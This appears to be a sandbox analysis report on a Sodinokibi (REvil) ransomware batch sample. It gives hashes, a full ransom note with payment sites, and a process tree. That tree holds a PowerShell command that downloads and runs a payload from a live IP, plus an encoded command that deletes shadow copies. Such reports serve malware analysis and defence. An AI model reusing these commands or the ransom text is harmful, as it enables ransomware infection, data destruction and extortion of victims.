Analysis

  • max time kernel
    127s
  • max time network
    52s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    21-05-2020 18:10

General

  • Target

    328013aa2b767f95491e4d8e9372cc46.bat

  • Size

    219B

  • MD5

    8da3de41f693d26688864e6e24e5c4f0

  • SHA1

    229f10d9481ea1c89a085e76365149ca34ca4614

  • SHA256

    de741f43e0b638ccbfadfc41f6e82f8fd2c5b39d4f9f38469affb4d4960487b5

  • SHA512

    70d2cb7f7cb47c2b9111d548b4f405ea7b5e95ced055d64e25190200487e174f36f2fe86aaa86c4778c2f6f3c8d10e05ba6a55b808437b2d180a4cee67240386

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/328013aa2b767f95491e4d8e9372cc46

Extracted

Path

C:\ow20ox3utq-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension ow20ox3utq. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F8CAEF7359F44750 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/F8CAEF7359F44750 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: M0wVlqBuENoJH/YI5GkO+qNzEQPkORJCJKrrjCKJYpL6ky17Dz7XIeJPoRXmWl9e 2rDV/B6sHfz4MI3dAIjuJ7Sa+7s0b0sKQhjM7S7s+6dzzjv9bVsnrLvmymJFtcau JFR9aBvnzFcJ70diStSGHNddsYwr8xS97lZ6/iPf4qOLPLKPNOF8YgBGtHtpYoui 4u11JbOJofFH8mgMPQRXa17KD0WXSJUM8pDtxXozie1Loi8tgU5Oynybw9Z37cT7 R21uw8EbqYgE1N+fOt5TC7rHOM9n6yiTX8XPjUN3VcaOsk8Fb9NszdJ4iHAqD4dr gFs2Dqa1hfBdSu1FjFAIuHy3qdmjyRGFIhqSd7FDPXM8J0xHbUBbxz7oDSjrKvlz j+JSqrIuyLI9cofLnAtN6PHDHMTJzRBcswnhz4rpZQdCDYBOezOjog7skdz20oks cJ/Fb02MIYVeW+DEechsC1MkMcg1k/3Rswrruowt9GIiTrrPduyELjU+YzxVOvLA P3oYPmtOHru7Wcf5CnY56QPltpECXhjNR7giwDUH7PbTyWH5thAxYaC/mwFSgjHL ht/EBYET0UvIE1TxIO2g7MYBZt2Qh2zqjsKd7pzGPRPhKGtIvgZ7I+e20krIWeHl Sopdvlc7L+sMRiHO259ekz6nB5D7iuJMo5maXQar1OyN/5/Lc5sz9SqshGi8Z6M5 c+kQR1bLATwYo0Bod+Ev207RHNJemJkGqwlYZuMCHUI4A3PSN/cIh/RuQ45H6xxT YxI3SEEusY4U/yeKT9Yf/6pC3luwAnmByqX7QzlxdvfyZY2LRBRhQtQTMycI8Wtj 2mNYkPL4iXtw+CTD0Yw8TCgQzHXkW3liqS8vaA+Y+x1GsgfTWrqB72jYdYcDyLmf H+TFm8RY8NDf6jftNxvO6aty4v0iCBn2m0kedRfWGElwnEsibUDsp0YLwxVsGc3i YNFNRmdd3uxxtCYDMiMNK3Bbod4ugLTxgSzoxONIonEut80NX1RJFvTdPIG7KTHF WuCNaNWKWR1tx9pT7BH5Y/y1J2WeaOr2yWGoKChvFGwbnQbz+Udunq0olPdVB4mW HQqU/Nr72y1be/jykt4b3Rs1RNQwjrapGzy7QNKXK3pEwq2DR0iW9iAQjgzZIJ1t bA1jAk49SUYIm7DEFCL1dJz6qqSi/3XgwuVQqKMzMzONKdhL5VxBTzvB7dsfYSCn ukm7G/610o/YIt3fTTMP2b6ly+rGUSZro4Fr5adFsB6oEGphFjHEyX+4y3dPxA8D ZLoAydNtTnP/xI1piZXhSrlbAlMQNBRZfnCEPcU/zwJq6LMt3GkkVg== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F8CAEF7359F44750

http://decryptor.cc/F8CAEF7359F44750

Signatures

  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Drops file in Program Files directory 27 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\328013aa2b767f95491e4d8e9372cc46.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:376
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/328013aa2b767f95491e4d8e9372cc46');Invoke-AATPTEWMZPXK;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      PID:1068
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1780
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1584

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms